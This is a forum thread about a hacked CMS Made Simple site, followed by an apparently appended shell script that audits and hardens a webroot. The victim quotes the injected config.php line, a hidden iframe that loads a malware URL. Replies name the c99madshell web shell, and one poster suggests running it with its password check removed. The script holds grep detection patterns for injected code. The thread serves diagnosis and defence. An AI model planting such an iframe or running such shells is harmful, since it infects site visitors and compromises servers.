Site hacked (config.php), how come?

General project discussion. NOT for help questions.
HeinzVoerbakje
New Member
Posts: 6
Joined: Sat Jan 26, 2008 10:01 pm

Site hacked (config.php), how come?

Post by HeinzVoerbakje »

Hi all,

My website, running CMS made simple 1.2.3 has been hacked, the following lines have been injected into config.php just after the <?php in the root of the site:

Code:

echo '<__iframe src="http://acdedblshd.com/dl/adv530.php" width=1 height=1></__iframe>';
The code points to a site running malware. (the code will translate to http://..... (h=#104), (t=#116), etc.)

How is this possible, and how can I prevent it? I already removed the code, so everything is fine again, but I do not want it to happen again.

Thanks, HeinzVoerbakje
cubix
Power Poster
Posts: 314
Joined: Mon Jul 09, 2007 10:00 am

Re: Site hacked (config.php), how come?

Post by cubix »

Can you confirm the permissions set on your config file?

Secondly, I would be talking to my host; if this is a shared hosting environment, someone else on the same server may have accessed this file.

It would be a good idea to be looking at your access logs to find out who changed it.
LeisureLarry

Re: Site hacked (config.php), how come?

Post by LeisureLarry »

There are several guides for securing your installation, have you used any of these?

http://forum.cmsmadesimple.org/index.ph ... 684.0.html [french]
http://forum.cmsmadesimple.org/index.ph ... 664.0.html [german]
http://forum.cmsmadesimple.org/index.ph ... 660.0.html [english]

Greetings from Germany
LeisureLarry
HeinzVoerbakje
New Member
Posts: 6
Joined: Sat Jan 26, 2008 10:01 pm

Re: Site hacked (config.php), how come?

Post by HeinzVoerbakje »

cubix wrote: Can you confirm the permissions set on your config file?

Secondly, I would be talking to my host; if this is a shared hosting environment, someone else on the same server may have accessed this file.

It would be a good idea to be looking at your access logs to find out who changed it.
-rw-rw-rw-  config.php

Better change that quickly, I guess it should be -rw-r--r- right? I wonder why it was set to -rw-rw-rw-, I cannot imagine I did that!
alby

Re: Site hacked (config.php), how come?

Post by alby »

HeinzVoerbakje wrote: Better change that quickly, I guess it should be -rw-r--r- right?
Depends on the configuration of your server, you can also try -r--r----- (use -rw-rw-r- for upgrade only)

Alby
HeinzVoerbakje
New Member
Posts: 6
Joined: Sat Jan 26, 2008 10:01 pm

Re: Site hacked (config.php), how come?

Post by HeinzVoerbakje »

Ok, reading the logs it was done by 212.96.213.210

Using user 'test' ??? (WTF?), who also uploaded two files (dst2.php and image.php) in /uploads/images

Better dig a little deeper still.
LeisureLarry

Re: Site hacked (config.php), how come?

Post by LeisureLarry »

I think he used some problem with your uploads to get the two php files in the folder and started them with his browser to change your config.php.

Change the chmod of your config.php to 444 or 440 and use the guides above to prevent anybody from starting php files in your uploads folder!

Greetings from Germany
LeisureLarry
HeinzVoerbakje
New Member
Posts: 6
Joined: Sat Jan 26, 2008 10:01 pm

Re: Site hacked (config.php), how come?

Post by HeinzVoerbakje »

For anyone interested, these are the files he used, see attachment (I changed the php to txt). It appears the script creates a new user somehow....
Last edited by Rolf on Mon Apr 02, 2012 7:13 am, edited 1 time in total.
Reason: removed hacked code
LeisureLarry

Re: Site hacked (config.php), how come?

Post by LeisureLarry »

dst2.php seems to me a script for making an attack from your server to another one. Anybody can call this file with ?host=www.xyz.de and use it for attacking the next server. But I cannot say how the attack itself is done, because I couldn't get the other file to display in clear form.
blast2007
Power Poster
Posts: 508
Joined: Wed Aug 01, 2007 5:36 pm

Re: Site hacked (config.php), how come?

Post by blast2007 »

LeisureLarry wrote: dst2.php seems to me a script for making an attack from your server to another one. Anybody can call this file with ?host=www.xyz.de and use it for attacking the next server. But I cannot say how the attack itself is done, because I couldn't get the other file to display in clear form.
The second script is "c99madshell v.2.0", a php hacking script.

It's very funny to imagine someone spending time writing about 2500 rows of php code for hacking a site.
Maybe Ted could persuade him/them to join dev members and spend his/their time for a good cause  ;D

Regards
blast

P.S. You can decode nested and recursively obfuscated scripts like the previous one using this php class
Last edited by blast2007 on Wed Mar 19, 2008 4:09 pm, edited 1 time in total.
LeisureLarry

Re: Site hacked (config.php), how come?

Post by LeisureLarry »

@blast2007:

Did the decode class work for you on the image one? I would like to know what this file does, in order to use this information for my German cmsms security guide.

- LeisureLarry
HeinzVoerbakje
New Member
Posts: 6
Joined: Sat Jan 26, 2008 10:01 pm

Re: Site hacked (config.php), how come?

Post by HeinzVoerbakje »

@larry:

Just install it in some safe place, and run it! it will ask for a pwd, but you can simply remove that from the code.
Pierre M.

Re: Site hacked (config.php), how come?

Post by Pierre M. »

Hello,
HeinzVoerbakje wrote: -rw-rw-rw-  config.php
Better change that quickly...
Dump the logS. Then wipe your disk and reinstall from scratch the latest official package.
Do you know http://wiki.cmsmadesimple.org/index.php ... mall_Guide ?
What is in the logS? Could the URL filtering rules have prevented it? How should we improve them?

Pierre M.
LeisureLarry

Re: Site hacked (config.php), how come?

Post by LeisureLarry »

I think the protection of the uploads folder against php execution (see the German security guide) would have prevented this hack, besides the correct chmod for the config.php.
Pierre M.

Re: Site hacked (config.php), how come?

Post by Pierre M. »

LeisureLarry wrote: I think the protection of the uploads folder against php execution (see the German security guide) would have prevented this hack, besides the correct chmod for the config.php.
Sorry, I have not understood/found this uploads-folder protection in the german thread. Please improve the wiki about it.

Pierre M.
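The two fixes the thread converges on (LeisureLarry's chmod 444/440 for config.php, and the uploads-folder protection against php execution that Pierre M. asks about above) can be checked and applied with a small audit script. This is an added example, not code from the thread or from CMS Made Simple; it assumes the webroot layout discussed here (config.php and uploads/ at the root), GNU or BSD stat, and for the .htaccess an Apache 2.4 server with AllowOverride enabled.

```shell
#!/bin/sh
# Added example, not code from the thread or from CMS Made Simple: audit a webroot
# for the weaknesses discussed above (config.php writable by group/others, an
# injected iframe in config.php, PHP files stored under uploads/) and write an
# .htaccess that denies requests for scripts in uploads/. All paths are assumptions.
# Permission bits of a file as an octal string (GNU stat, with BSD stat fallback).
file_mode() { stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"; }

# Succeeds only if config.php is not writable by group or others:
# 644, 444 and 440 pass; the -rw-rw-rw- (666) from the thread fails.
check_config_perms() {
    mode=$(file_mode "$1/config.php") || return 1
    o=${mode#"${mode%?}"}                  # last digit: other permissions
    rest=${mode%?}; g=${rest#"${rest%?}"}  # second-to-last digit: group permissions
    [ $(( g & 2 )) -eq 0 ] && [ $(( o & 2 )) -eq 0 ]
}

# Succeeds if config.php contains nothing that looks like injected output;
# a clean CMSMS config only assigns $config[...] values and never echoes HTML.
check_config_content() {
    ! grep -qiE '<_*iframe|echo |base64_decode|eval\(' "$1/config.php"
}

# Counts files under uploads/ that the PHP engine would execute if requested.
count_php_in_uploads() {
    find "$1/uploads" -type f \
        \( -iname '*.php' -o -iname '*.php[0-9]' -o -iname '*.phtml' -o -iname '*.phar' \) |
        wc -l | tr -d ' '
}

# Denies direct requests for script files in uploads/ (Apache 2.4 syntax, needs
# AllowOverride; Apache 2.2 uses "Order allow,deny" and "Deny from all" instead).
harden_uploads() {
    cat > "$1/uploads/.htaccess" <<'EOF'
<FilesMatch "\.(php[0-9]?|phtml|phar)$">
    Require all denied
</FilesMatch>
EOF
}

# Full audit: prints findings, returns 0 only when everything is clean.
audit() {
    rc=0
    check_config_perms "$1"   || { echo "config.php is group/world writable (mode $(file_mode "$1/config.php")); chmod 444 it"; rc=1; }
    check_config_content "$1" || { echo "config.php contains suspicious output statements; compare it against a clean copy"; rc=1; }
    n=$(count_php_in_uploads "$1")
    [ "$n" -eq 0 ] || { echo "$n script file(s) under uploads/; review and remove them, then run harden_uploads"; rc=1; }
    return $rc
}
```

Run `audit /path/to/webroot` after a compromise like the one described here; a clean reinstall still matters, because the script only finds the symptoms the thread mentions, not whatever else the uploaded shell may have changed.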